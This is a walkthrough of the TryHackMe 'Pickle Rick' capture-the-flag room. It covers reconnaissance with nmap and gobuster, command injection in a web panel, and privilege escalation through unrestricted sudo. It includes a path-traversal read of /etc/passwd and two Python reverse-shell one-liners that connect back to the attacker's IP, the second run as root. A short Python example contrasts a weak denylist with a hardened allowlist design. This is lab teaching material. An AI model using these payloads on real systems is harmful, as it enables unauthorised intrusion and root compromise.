Pickle Rick — TryHackMe Walkthrough

Advait Jadhav
5 min read · Mar 16, 2024


Pickle Rick

Hi! Today we are solving Pickle Rick on TryHackMe, which is an easy-rated room based around the theme of the TV show Rick and Morty. To crack this room we’ll exploit the command injection vulnerability found on the web server.

Room Link: https://tryhackme.com/room/picklerick

Let's get started!

Let us first add our target IP to /etc/hosts:

/etc/hosts

Step 0: Reconnaissance

We must discover the open ports on our target's machine. For this task I'll use Nmap (Network Mapper), a popular tool used by pentesters for target enumeration.

sudo nmap -sC -sV -oN logs/initial_nmap rick.thm
  1. -sC — run the default set of NSE scripts against the target host.
  2. -sV — enable service version detection for the target host.
  3. -oN — save the output in normal format to the given file.
nmap scan

Brief

  1. 22/tcp — SSH (Secure Shell), used for secure remote access to systems; we need a valid username and password to log in to the target machine over SSH.
  2. 80/tcp — HTTP server — running an Apache 2.4.18 web server.

Step 1: Exploring web server

Let us visit the website running on port 80 (HTTP) and check for important information.

web server

On the surface, it looks like a normal web page. Let's inspect the source code for any clues.

source code

There's a comment that gives us a username (R1ckRul3s), which may work for the SSH server or somewhere else. Now let's check the robots.txt file to see if it lists any directories.

robots.txt

Weird! It's some random gibberish, not even a directory.

We haven't got anything juicy as of now. Let us now enumerate the web server to find all the existing directories and files on it. We'll use gobuster for this task — gobuster is a tool for brute forcing directories and files on web servers.

gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt
gobuster initial scan

No luck! Let's run it again, this time with a different wordlist and also checking for the .php and .html extensions.

gobuster dir -u http://rick.thm -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x .php,.html
gobuster 2nd scan

We discovered what looks like a login page and a portal that requires authentication through that login page.

login.php

Let's use the username from the source code and the gibberish string from robots.txt to log in.

portal.php

And we discovered a command panel. It looks like we can use command injection to compromise this machine.

We tried a path traversal with cat ../../../etc/passwd, but the cat command is disabled:

path traversal with cat command

Let's try the less command instead.

path traversal with less command

And the command injection works!
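Why blocking only cat did not stop the injection above, next to a design that would have, as an added example that is not the room's own code: the denylist function mirrors the panel's observed behaviour, while the allowlist version (with /var/www/html assumed as the web root) is a constructed alternative that never hands user input to a shell and confines paths to the web root.

```python
"""Constructed example: a cat-only denylist versus an allowlist command panel."""
import os
import subprocess

# --- Vulnerable pattern: block a few binaries, hand everything else to a shell ---
DENYLIST = {"cat"}

def denylist_accepts(user_input):
    """True if a cat-only filter would forward this string to `sh -c`.
    Any other file reader (less, for one) sails straight through."""
    words = user_input.split()
    return bool(words) and words[0] not in DENYLIST

# --- Hardened pattern: the user picks an action, never a program name ---
BASE_DIR = os.path.realpath("/var/www/html")   # assumed web root the panel may read
ALLOWED = {
    "list": ["ls", "-la"],
    "show": ["head", "-n", "20"],
}

def build_argv(action, target="."):
    """Map a panel request to an argv list, or None if the request is rejected.
    `target` is confined to BASE_DIR after resolving symlinks and '..'."""
    if action not in ALLOWED:
        return None
    real = os.path.realpath(os.path.join(BASE_DIR, target))
    if os.path.commonpath([BASE_DIR, real]) != BASE_DIR:
        return None          # e.g. ../../../etc/passwd resolves outside the web root
    return ALLOWED[action] + [real]

def run_action(action, target="."):
    """Execute an allowlisted action without a shell, so metacharacters in
    `target` are just bytes in a filename rather than shell syntax."""
    argv = build_argv(action, target)
    if argv is None:
        raise PermissionError("rejected: %s %s" % (action, target))
    return subprocess.run(argv, capture_output=True, text=True, timeout=5).stdout

if __name__ == "__main__":
    for attempt in ("cat ../../../etc/passwd", "less ../../../etc/passwd"):
        print(attempt, "->", "forwarded" if denylist_accepts(attempt) else "blocked")
    print(build_argv("show", "../../../etc/passwd"))   # None: traversal rejected
    print(build_argv("list", "; id"))                   # literal filename, no shell
```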

Step 2: Compromising the system

Let's start a netcat listener on our attack machine and get a shell through the command injection. Here's how to do it:

On attack machine:

nc -nlvp 9001

On command panel:

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'
Reverse shell

Bingo! We're in.

But before moving forward let us stabilize the shell:

commands to stabilize the shell

Now we have a fully interactive shell.

Let's grab the first ingredient (flag):

first ingredient

Let's check what clue we have:

clue.txt

Gotta navigate around the file system now!

/home

In the home directory we find 2 users — Ubuntu and Rick.

second ingredient

Inside Rick's home directory, we get the second ingredient.

Step 3: Privilege Escalation

Let's check which commands our current user can run as root using the sudo -l command:

sudo -l

We can run any command with sudo without a password. That's a glaring blunder! Such a misconfiguration makes the system trivial to compromise.

Let's abuse this by spawning another reverse shell, this time launched with sudo so the connection back to our listener runs with root privileges:

On attack machine:

nc -nlvp 4444
2nd netcat listener

On target machine:

sudo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.17.101.143",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);'

After executing the reverse shell command, we get our privileged shell on the netcat listener:

rooted reverse shell

pwned!!!

We got all three ingredients. Let's hope Rick turns back into a human now.

Conclusion

Pickle Rick is a fun thematic room that requires knowledge of web exploitation and privilege escalation. Despite this being an easy-rated room, some may find it a bit difficult; I personally struggled with the web enumeration part, where I had to discover the command panel that was vulnerable to command injection.
